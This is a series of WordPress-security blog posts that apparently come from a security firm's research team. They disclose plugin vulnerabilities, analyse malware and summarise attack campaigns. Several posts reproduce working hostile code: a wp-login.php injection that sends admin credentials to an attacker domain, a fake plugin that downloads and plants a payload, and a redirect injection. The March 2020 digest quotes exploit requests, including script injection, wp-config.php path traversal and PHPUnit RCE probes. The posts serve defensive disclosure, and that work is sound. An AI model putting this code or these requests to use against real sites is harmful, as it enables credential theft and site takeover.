Category: WordPress Security

Unauthenticated Stored Cross Site Scripting in WP Product...

 

Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6

 

During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.

unknown shell packer

Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Product Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

May 14, 2020 by John Castro

WordPress Admin Login Stealer

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file wp-login.php to intercept the information of a valid user and send it to the attacker.

The script gathers the site URL, IP, username and password details, then sends them to the remote site via curl. 

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip=$_SERVER['REMOTE_ADDR'];
$ccc_url=base64_decode("aHR0cDovLzEuc2FsZWZvcnlvdS5vcmcvdG9uZy9wYS9uZXdwdy9wYXNzLnBocD9hZG1pbmlwPQ").base64_encode($ip)."&host=".base64_encode($url)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
$ccc=@file_get_contents($ccc_url);
if(empty($ccc)){function get_pass_Html($url){$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
curl_exec($ch);
curl_close($ch);
return true;
}
get_pass_Html($ccc_url);
}
setcookie("whatsup","whatsupman",time()+3600*24*365);

Further analysis reveals that the base64 encoded string in this malicious script is actually the attacker’s URL: 

hxxp://[1].saleforyou[.]org/tong/pa/newpw/pass.php?adminip=

Here is the information sent via curl: 

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=$ip&host=$url&name=$_POST['log']&password=$_POST['pwd']

Malware Variants & Sub-Domains

This login stealing malware appears to have been distributed and used on other websites for about a year now. The same top-level domain has also been seen in other malware variations, but uses a different subdomain: 5[.]saleforyou[.]org 

GET_Html('http://5[.]saleforyou[.]org/ming/exam/main.php?key='.$_GET['exam']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);

Another variation also appears to be collecting server IP and HTTP_HOST using a different URL on the same domain: 

curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$content = curl_exec($ch);curl_close($ch);}return $content;}$jturl = "http://1[.]saleforyou[.]org/tong/get/htc/1.php?adminip=".$server_ip."&host=".$_SERVER['HTTP_HOST'];
  • saleforyou[.]org. 300 IN A 23.88.229.79 \ Enzu Inc.
  • 1.saleforyou[.]org. 300 IN A 172.246.126.170 \ Enzu Inc.
  • 2.saleforyou[.]org. 300 IN A 192.157.233.59 \ Enzu Inc.
  • 3.saleforyou[.]org. 300 IN A 192.157.233.176 \ Enzu Inc.
  • 4.saleforyou[.]org. 300 IN A 23.89.201.143 \ Enzu Inc.
  • 5.saleforyou[.]org. 300 IN A 144.208.127.115 \ Shock Hosting LLC
  • 6.saleforyou[.]org. 300 IN A 208.123.119.189 \ Shock Hosting LLC

It looks like Enzu Inc. has a long history of facilitating malware, spam, and general abuse; their IPs are listed in Stop Badware’s top 50 lists:

Each subdomain is being used for a different campaign, with some hosted on different servers — and even different datacenters.

Related Domains

Another domain, bingstyle[.]com, appears to be related. Attackers are using a similar URL structure for malicious files: tong/pa/pass.php

  • bingstyle[.]com. 300 IN A 104.31.70.141
  • bingstyle[.]com. 300 IN A 104.31.71.141

These Virustotal results suggest a relationship to saleforyou[.]org, or at least the same group: https://www.virustotal.com/gui/domain/bingstyle.com/relations

Unfortunately, bingstyle[.]com is using CloudFlare and we are unable to tell exactly where it's hosted.

Mitigation Steps

Login credential stealers like this one can easily be used as a backdoor to maintain unauthorized access to a website long after the initial infection. The malicious script will simply continue to send the stolen login credentials to the attacker until it is removed from the compromised environment.

To catch these types of infections, set up and maintain a file monitoring system to alert you to any changes in your core WordPress files and detect malicious activity along with other indicators of compromise.

Apr 27, 2020 by Krasimir Konov

Fake M-Shield WordPress Plugin

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found almost an identical plugin under the name kingof, with malicious code hosted in the file: ./wp-content/plugins/kingof/kingof.php

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of “random” files to check if they exist and their filesize is lower than 1000 bytes. If the condition isn’t met, the script downloads this malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and injects into contents into the files from the $amb array.

<?php
function shield_01()
{
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
          $f=ABSPATH.$f;
            if(!file_exists($f)||filesize($f)<1000) {
                if(!$wsd) 
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
              if($wsd)
                file_put_contents($f,$wsd);
          }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Apr 21, 2020 by Krasimir Konov

Fake License.txt File Loaded Through PHP Include

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named license.txt.

During our investigation, we located the license.txt injected within header.php of the WordPress theme file. 

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect to send site visitors to a malicious domain, which uses HTML to generate a redirect to the malicious website https://times2day[.]com, and was registered on February 6th, 2020. 

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.

Apr 3, 2020 by Luke Leal

Face Mask Spam Links Injected in WordPress Database

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase in search queries related to face masks.

To make their campaign more difficult to detect and boost SEO rankings, the attackers use a multitude of compromised third-party websites to funnel their traffic. They also use the World Health Organization name and images to add credibility to their campaign.

World Health Organization spam image

Spam links are injected into the widgets section of the wp_options database, resulting in the compromised environment linking to third-party sites trying to rank for face mask search terms.

Face mask spam links

The spam links have been set to conceal themselves from website visitors using <div style="display:none;">, all of which lead to the Shopify website https://lundybright[.]fr/ which was registered on March 2nd.

Compromised websites impacted by this spam campaign can use our hacked website cleanup guide to remove the infection.

Apr 2, 2020 by Luke Leal

Vulnerabilities Digest: March 2020

Fixed Plugins and Vulnerabilities

Plugin Vulnerability Patched Version Installs
Cookiebot Reflected Cross-Site Scripting 3.6.1 40000
Data Tables Generator By Supsystic Authenticated Stored XSS 1.9.92 30000
WPvivid Backup Database Leak 0.9.36 40000
Advanced Ads Reflected XSS 1.17.4 100000
Category Page Icons Arbitrary File Upload/Deletion 0.9.1 Closed
Cookiebot Reflected Cross-Site Scripting 3.6.1 40000
Custom Post Type UI CSRF to Stored XSS 1.7.4 800000
Fruitful Authenticated Stored XSS 3.8.2 9000
responsive-add-ons Unprotected AJAX Endpoints 2.2.6 40000
Import Export WordPress Users Authenticated Arbitrary User Creation 1.3.9 30000
LearnPress Privilege Escalation 3.2.6.7 70000
Multiple Plugins Unauthenticated RCE via PHPUnit all -
Multiple WebToffee Plugins CSRF 1.3.3 2000
Popup Builder Multiple Issues 3.64.1 100000
Viral Optins Arbitrary File Upload all closed
WordPress File Upload Directory Traversal to RCE 4.13.0 20000
WPML Cross Site Request Forgery to RCE 4.3.7 30000

 

Highlights for March 2020

Cross site scripting and Cross Site Request Forgery vulnerabilities were most prevalent this month. Attackers took advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.

Ongoing Campaign Targets Plugin Vulnerabilities

An ongoing malicious campaign that we’ve been actively tracking since early 2019 continues targeting new plugin vulnerabilities to inject malicious domains.

Malicious domain injected during this month: clon[.]collectfasttracks[.]com

Social Metrics Tracker

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1"

Simple Fields

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1"

Pricing Table by Supsystic

 185.212.128.162 - - [18/Mar/2020] "GET /wp-admin/admin-ajax.php?action=getJSONExportTable&tables[]=8&reqType=ajax&mod=tables&pl=pts HTTP/1.1"

Brizy – Page Builder

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1"

WP Security Audit Log

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1"

WordPress WP User Frontend

185.219.168.18 - - [17/Mar/2020] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1"

Adblock Blocker

185.219.168.18 - --0747fb1e8d3cfc0d658e7a77f51c7758\x0D\x0AContent-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A\x0D\x0A[...] echo \x22not exits\x22;\x0D\x0Aecho \x22done .\x5Cn \x22 ;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--0747fb1e8d3cfc0d658e7a77f51c7758--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1"

Multiple Plugins - Access to Sensitive Files

113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23

Multiple Plugins Affected by an Old Vulnerability in PHPUnit

As seen in January attackers are continuing to leverage an RCE in PHPUnit along with several plugin vulnerabilities found in the past month.

Unpatched versions of PHPUnit prior to 4.8.28 and 5.6.3 allow remote attackers to execute arbitrary PHP code via HTTP POST data.

Jekyll-exporter

118.27.25.88 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

Wp-heyloyalty

118.27.5.203 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [12/Mar/2020] "POST //wp-content/plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
[...]

Detected IPs

163.44.149.193
118.27.5.203
118.27.25.88
185.219.168.18
77.71.115.52
182.161.69.114
5.101.0.209
190.117.233.1

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Mar 27, 2020 by John Castro

Reflected XSS in Cookiebot Administrative Page

A reflected XSS vulnerability has recently been found in the Cookiebot plugin plugin, impacting a user base of over 40k installs. Versions prior to 3.6.1 are susceptible to this attack, which allows hackers to exploit the vulnerability found on administrative pages.

This vulnerability is caused by the manual tabs mechanism, which tries to add a class to the form with the current tab. 

<?php if ( isset( $_GET['tab'] ) ) {
     $active_tab = $_GET['tab'];
} else if ( $active_tab == 'unavailable_addons' ) {
     $active_tab = 'unavailable_addons';
} else {
     $active_tab = 'available_addons';
} ?>

// ...

<form method="post" action="options.php" class="<?php echo $active_tab; ?>">

The issue lies in the fact that only two tab types should be present: available_addons or unavailable_addons. These values are never checked, however, and are directly inserted into the form class attribute.

This improper implementation leads to the potential for a reflected cross-site scripting attack which relies on human behavior - such as an administrator visiting a link.
If the website administrator visits an attacker’s specially crafted URL, the bad actor may be able to compromise and take over the website.

Timeline:

  • 2020-03-11: Initial disclosure
  • 2020-03-12: Version 3.6.1 released

Mitigation Steps:

Websites using Cookiebot versions lower than 3.6.1 should update their plugins to the latest patch immediately to mitigate risk. As always, customers using our WAF are protected from this issue with our virtual patching technology.

 

Mar 23, 2020 by Antony Garand